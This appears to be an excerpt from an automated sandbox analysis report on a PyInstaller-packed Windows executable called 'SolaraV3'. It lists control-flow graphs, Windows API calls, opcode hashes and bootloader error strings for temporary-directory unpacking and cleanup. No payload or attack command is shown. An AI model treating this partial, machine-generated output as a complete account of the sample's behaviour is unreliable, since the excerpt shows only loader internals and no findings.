221->222 222->220 228 7ff6dc703da7-7ff6dc703db6 LoadLibraryExW 222->228 224->212 225->215 226->159 228->220 230->226 231->215 233->234 237 7ff6dc703e02-7ff6dc703e11 call 7ff6dc708830 234->237 238 7ff6dc703ef9-7ff6dc703f00 234->238 251 7ff6dc703e13-7ff6dc703e19 237->251 252 7ff6dc703e2a-7ff6dc703e34 call 7ff6dc714f30 237->252 241 7ff6dc704000-7ff6dc704008 238->241 242 7ff6dc703f06-7ff6dc703f0d 238->242 246 7ff6dc70402d-7ff6dc70405f call 7ff6dc7036a0 call 7ff6dc703360 call 7ff6dc703670 call 7ff6dc706fc0 call 7ff6dc706d70 241->246 247 7ff6dc70400a-7ff6dc704027 PostMessageW GetMessageW 241->247 242->241 245 7ff6dc703f13-7ff6dc703f1d call 7ff6dc7033c0 242->245 245->226 259 7ff6dc703f23-7ff6dc703f37 call 7ff6dc7090c0 245->259 247->246 255 7ff6dc703e25-7ff6dc703e27 251->255 256 7ff6dc703e1b-7ff6dc703e23 251->256 261 7ff6dc703eea-7ff6dc703ef4 call 7ff6dc708940 252->261 262 7ff6dc703e3a-7ff6dc703e40 252->262 255->252 256->255 271 7ff6dc703f5c-7ff6dc703f98 call 7ff6dc708940 call 7ff6dc7089e0 call 7ff6dc706fc0 call 7ff6dc706d70 call 7ff6dc7088e0 259->271 272 7ff6dc703f39-7ff6dc703f56 PostMessageW GetMessageW 259->272 261->238 262->261 266 7ff6dc703e46-7ff6dc703e4c 262->266 269 7ff6dc703e4e-7ff6dc703e50 266->269 270 7ff6dc703e57-7ff6dc703e59 266->270 274 7ff6dc703e52 269->274 275 7ff6dc703e5f-7ff6dc703e7b call 7ff6dc706dc0 call 7ff6dc707340 269->275 270->238 270->275 307 7ff6dc703f9d-7ff6dc703f9f 271->307 272->271 274->238 290 7ff6dc703e7d-7ff6dc703e84 275->290 291 7ff6dc703e86-7ff6dc703e8d 275->291 293 7ff6dc703ed3-7ff6dc703ee8 call 7ff6dc702a50 call 7ff6dc706fc0 call 7ff6dc706d70 290->293 294 7ff6dc703e8f-7ff6dc703e9c call 7ff6dc706e00 291->294 295 7ff6dc703ea7-7ff6dc703eb1 call 7ff6dc7071b0 291->295 293->238 294->295 304 7ff6dc703e9e-7ff6dc703ea5 294->304 305 7ff6dc703eb3-7ff6dc703eba 295->305 306 7ff6dc703ebc-7ff6dc703eca call 7ff6dc7074f0 295->306 304->293 305->293 306->238 318 7ff6dc703ecc 306->318 310 7ff6dc703fa1-7ff6dc703fb7 call 7ff6dc708ed0 call 7ff6dc7088e0 307->310 311 7ff6dc703fed-7ff6dc703ffb call 7ff6dc701900 307->311 310->311 323 7ff6dc703fb9-7ff6dc703fce 310->323 311->226 318->293 324 7ff6dc703fd0-7ff6dc703fe3 call 7ff6dc702710 call 7ff6dc701900 323->324 325 7ff6dc703fe8 call 7ff6dc702a50 323->325 324->226 325->311
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                              • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                                                                                                                                                                                              • API String ID: 2776309574-3273434969
                                                                                                                                                                                                                              • Opcode ID: be5b1485ddbaef6361bb4e3b11d5ceb35ad4a10a396fe0c475ce2c74d9fdd6eb
                                                                                                                                                                                                                              • Instruction ID: dfc6b9dcc23d036ac38d1d12981a41f8e3d0fca2f62b258947a36f72bebd2efd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: be5b1485ddbaef6361bb4e3b11d5ceb35ad4a10a396fe0c475ce2c74d9fdd6eb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E632BD21A1CA8A91FA39D722D4653BD6771AF44784F844133DA5DC32C6EF2EE57AE300

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 538 7ff6dc726964-7ff6dc7269d7 call 7ff6dc726698 541 7ff6dc7269d9-7ff6dc7269e2 call 7ff6dc714ee8 538->541 542 7ff6dc7269f1-7ff6dc7269fb call 7ff6dc718520 538->542 549 7ff6dc7269e5-7ff6dc7269ec call 7ff6dc714f08 541->549 547 7ff6dc726a16-7ff6dc726a7f CreateFileW 542->547 548 7ff6dc7269fd-7ff6dc726a14 call 7ff6dc714ee8 call 7ff6dc714f08 542->548 551 7ff6dc726afc-7ff6dc726b07 GetFileType 547->551 552 7ff6dc726a81-7ff6dc726a87 547->552 548->549 566 7ff6dc726d32-7ff6dc726d52 549->566 558 7ff6dc726b09-7ff6dc726b44 GetLastError call 7ff6dc714e7c CloseHandle 551->558 559 7ff6dc726b5a-7ff6dc726b61 551->559 555 7ff6dc726ac9-7ff6dc726af7 GetLastError call 7ff6dc714e7c 552->555 556 7ff6dc726a89-7ff6dc726a8d 552->556 555->549 556->555 564 7ff6dc726a8f-7ff6dc726ac7 CreateFileW 556->564 558->549 572 7ff6dc726b4a-7ff6dc726b55 call 7ff6dc714f08 558->572 562 7ff6dc726b69-7ff6dc726b6c 559->562 563 7ff6dc726b63-7ff6dc726b67 559->563 569 7ff6dc726b72-7ff6dc726bc7 call 7ff6dc718438 562->569 570 7ff6dc726b6e 562->570 563->569 564->551 564->555 577 7ff6dc726be6-7ff6dc726c17 call 7ff6dc726418 569->577 578 7ff6dc726bc9-7ff6dc726bd5 call 7ff6dc7268a0 569->578 570->569 572->549 583 7ff6dc726c19-7ff6dc726c1b 577->583 584 7ff6dc726c1d-7ff6dc726c5f 577->584 578->577 585 7ff6dc726bd7 578->585 586 7ff6dc726bd9-7ff6dc726be1 call 7ff6dc71aac0 583->586 587 7ff6dc726c81-7ff6dc726c8c 584->587 588 7ff6dc726c61-7ff6dc726c65 584->588 585->586 586->566 591 7ff6dc726d30 587->591 592 7ff6dc726c92-7ff6dc726c96 587->592 588->587 590 7ff6dc726c67-7ff6dc726c7c 588->590 590->587 591->566 592->591 594 7ff6dc726c9c-7ff6dc726ce1 CloseHandle CreateFileW 592->594 595 7ff6dc726d16-7ff6dc726d2b 594->595 596 7ff6dc726ce3-7ff6dc726d11 GetLastError call 7ff6dc714e7c call 7ff6dc718660 594->596 595->591 596->595
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1617910340-0
                                                                                                                                                                                                                              • Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                              • Instruction ID: 1f658a21a2cf1cc71e7a8a535b4a0c0e3411f9669a95ad32ae96509cf338d8e8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BFC1B136B28A4A85EB20CFA9C4A16AC7761F749B98F115237DE1E977D4CF38D466C300

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(?,00007FF6DC708919,00007FF6DC703F9D), ref: 00007FF6DC70842B
                                                                                                                                                                                                                              • RemoveDirectoryW.KERNEL32(?,00007FF6DC708919,00007FF6DC703F9D), ref: 00007FF6DC7084AE
                                                                                                                                                                                                                              • DeleteFileW.KERNELBASE(?,00007FF6DC708919,00007FF6DC703F9D), ref: 00007FF6DC7084CD
                                                                                                                                                                                                                              • FindNextFileW.KERNELBASE(?,00007FF6DC708919,00007FF6DC703F9D), ref: 00007FF6DC7084DB
                                                                                                                                                                                                                              • FindClose.KERNEL32(?,00007FF6DC708919,00007FF6DC703F9D), ref: 00007FF6DC7084EC
                                                                                                                                                                                                                              • RemoveDirectoryW.KERNELBASE(?,00007FF6DC708919,00007FF6DC703F9D), ref: 00007FF6DC7084F5
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                              • String ID: %s\*
                                                                                                                                                                                                                              • API String ID: 1057558799-766152087
                                                                                                                                                                                                                              • Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                              • Instruction ID: 398dc6730260bb16ff4ede751416c0e23ca2e6ce85e6efacb00cf5f107a4fce0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B2417F21A0CA4A85EA709F61A4541FE6370FB94794F400333E6AEC26C4EF3DE567D701
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2295610775-0
                                                                                                                                                                                                                              • Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                              • Instruction ID: 82ed977e490c0724387f4112aa077d80b004f8bc2e4f685765b5bb3ec7dbbf20
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B6F06822A1C74686F7708B64F49976E7360AB84778F444336DA6E426D4DF3CD06ADB04
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1010374628-0
                                                                                                                                                                                                                              • Opcode ID: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
                                                                                                                                                                                                                              • Instruction ID: 520a1df902abe038af48126fdc0ee7bd1311f12a73f8a99ddc235553f6fb8ece
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6302DD31E1D64E41FA72AB25982037DAA94BF05BA0F554637DD6DCA3D2DE3CA4738320

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 331 7ff6dc701950-7ff6dc70198b call 7ff6dc7045c0 334 7ff6dc701991-7ff6dc7019d1 call 7ff6dc707f90 331->334 335 7ff6dc701c4e-7ff6dc701c72 call 7ff6dc70c550 331->335 340 7ff6dc701c3b-7ff6dc701c3e call 7ff6dc71004c 334->340 341 7ff6dc7019d7-7ff6dc7019e7 call 7ff6dc7106d4 334->341 345 7ff6dc701c43-7ff6dc701c4b 340->345 346 7ff6dc7019e9-7ff6dc701a03 call 7ff6dc714f08 call 7ff6dc702910 341->346 347 7ff6dc701a08-7ff6dc701a24 call 7ff6dc71039c 341->347 345->335 346->340 353 7ff6dc701a45-7ff6dc701a5a call 7ff6dc714f28 347->353 354 7ff6dc701a26-7ff6dc701a40 call 7ff6dc714f08 call 7ff6dc702910 347->354 361 7ff6dc701a5c-7ff6dc701a76 call 7ff6dc714f08 call 7ff6dc702910 353->361 362 7ff6dc701a7b-7ff6dc701afc call 7ff6dc701c80 * 2 call 7ff6dc7106d4 353->362 354->340 361->340 373 7ff6dc701b01-7ff6dc701b14 call 7ff6dc714f44 362->373 376 7ff6dc701b35-7ff6dc701b4e call 7ff6dc71039c 373->376 377 7ff6dc701b16-7ff6dc701b30 call 7ff6dc714f08 call 7ff6dc702910 373->377 383 7ff6dc701b50-7ff6dc701b6a call 7ff6dc714f08 call 7ff6dc702910 376->383 384 7ff6dc701b6f-7ff6dc701b8b call 7ff6dc710110 376->384 377->340 383->340 390 7ff6dc701b9e-7ff6dc701bac 384->390 391 7ff6dc701b8d-7ff6dc701b99 call 7ff6dc702710 384->391 390->340 395 7ff6dc701bb2-7ff6dc701bb9 390->395 391->340 397 7ff6dc701bc1-7ff6dc701bc7 395->397 398 7ff6dc701be0-7ff6dc701bef 397->398 399 7ff6dc701bc9-7ff6dc701bd6 397->399 398->398 400 7ff6dc701bf1-7ff6dc701bfa 398->400 399->400 401 7ff6dc701c0f 400->401 402 7ff6dc701bfc-7ff6dc701bff 400->402 403 7ff6dc701c11-7ff6dc701c24 401->403 402->401 404 7ff6dc701c01-7ff6dc701c04 402->404 405 7ff6dc701c2d-7ff6dc701c39 403->405 406 7ff6dc701c26 403->406 404->401 407 7ff6dc701c06-7ff6dc701c09 404->407 405->340 405->397 406->405 407->401 408 7ff6dc701c0b-7ff6dc701c0d 407->408 408->403
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC707F90: _fread_nolock.LIBCMT ref: 00007FF6DC70803A
                                                                                                                                                                                                                              • _fread_nolock.LIBCMT ref: 00007FF6DC701A1B
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC702910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6DC701B6A), ref: 00007FF6DC70295E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                              • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                              • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                              • Opcode ID: 75df882cb69919a76d97c614361eef51b2ec2ab8d5059f73c2ac4bb1c74e6529
                                                                                                                                                                                                                              • Instruction ID: 48af358b863a094ba1041e37a2b0a7fbe8ac0a8961aae4652bcf3dc32a0cab23
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 75df882cb69919a76d97c614361eef51b2ec2ab8d5059f73c2ac4bb1c74e6529
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D81C171A0868A8AEB20DB25D0502BE73B0FF48784F444437E98EC7799DE3DE5A79740

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 409 7ff6dc701600-7ff6dc701611 410 7ff6dc701613-7ff6dc70161c call 7ff6dc701050 409->410 411 7ff6dc701637-7ff6dc701651 call 7ff6dc7045c0 409->411 416 7ff6dc70162e-7ff6dc701636 410->416 417 7ff6dc70161e-7ff6dc701629 call 7ff6dc702710 410->417 418 7ff6dc701653-7ff6dc701681 call 7ff6dc714f08 call 7ff6dc702910 411->418 419 7ff6dc701682-7ff6dc70169c call 7ff6dc7045c0 411->419 417->416 425 7ff6dc70169e-7ff6dc7016b3 call 7ff6dc702710 419->425 426 7ff6dc7016b8-7ff6dc7016cf call 7ff6dc7106d4 419->426 433 7ff6dc701821-7ff6dc701824 call 7ff6dc71004c 425->433 434 7ff6dc7016d1-7ff6dc7016f4 call 7ff6dc714f08 call 7ff6dc702910 426->434 435 7ff6dc7016f9-7ff6dc7016fd 426->435 441 7ff6dc701829-7ff6dc70183b 433->441 447 7ff6dc701819-7ff6dc70181c call 7ff6dc71004c 434->447 438 7ff6dc7016ff-7ff6dc70170b call 7ff6dc701210 435->438 439 7ff6dc701717-7ff6dc701737 call 7ff6dc714f44 435->439 446 7ff6dc701710-7ff6dc701712 438->446 448 7ff6dc701761-7ff6dc70176c 439->448 449 7ff6dc701739-7ff6dc70175c call 7ff6dc714f08 call 7ff6dc702910 439->449 446->447 447->433 453 7ff6dc701802-7ff6dc70180a call 7ff6dc714f30 448->453 454 7ff6dc701772-7ff6dc701777 448->454 463 7ff6dc70180f-7ff6dc701814 449->463 453->463 456 7ff6dc701780-7ff6dc7017a2 call 7ff6dc71039c 454->456 464 7ff6dc7017a4-7ff6dc7017bc call 7ff6dc710adc 456->464 465 7ff6dc7017da-7ff6dc7017e6 call 7ff6dc714f08 456->465 463->447 470 7ff6dc7017c5-7ff6dc7017d8 call 7ff6dc714f08 464->470 471 7ff6dc7017be-7ff6dc7017c1 464->471 472 7ff6dc7017ed-7ff6dc7017f8 call 7ff6dc702910 465->472 470->472 471->456 473 7ff6dc7017c3 471->473 476 7ff6dc7017fd 472->476 473->476 476->453
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                              • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                              • Opcode ID: 645a3b5b24f933cc0bab58613a2994309c3e2b32406c1725b0ea23ef8f235f05
                                                                                                                                                                                                                              • Instruction ID: f6a25d392880169f459ce35b928d1bf17b9a9d6a19c3ce52619e96d98dceac57
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 645a3b5b24f933cc0bab58613a2994309c3e2b32406c1725b0ea23ef8f235f05
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD51AE21B0864F86EA20AB2694201BD63A0BF44794F444533EE4DC77DADE3DF567E340

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetTempPathW.KERNEL32(?,?,00000000,00007FF6DC703CBB), ref: 00007FF6DC708704
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00007FF6DC703CBB), ref: 00007FF6DC70870A
                                                                                                                                                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00007FF6DC703CBB), ref: 00007FF6DC70874C
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC708830: GetEnvironmentVariableW.KERNEL32(00007FF6DC70388E), ref: 00007FF6DC708867
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC708830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6DC708889
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC718238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC718251
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC702810: MessageBoxW.USER32 ref: 00007FF6DC7028EA
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                              • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                              • Opcode ID: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
                                                                                                                                                                                                                              • Instruction ID: c3f9c04f3f87d20f91d7bb1442674cb1982467ea68f41431e2d5731548bdd16e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6241C211B1964A44FA25E767A8652FD52A0AF887C0F845233ED0DC77DADE3DE523D700

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
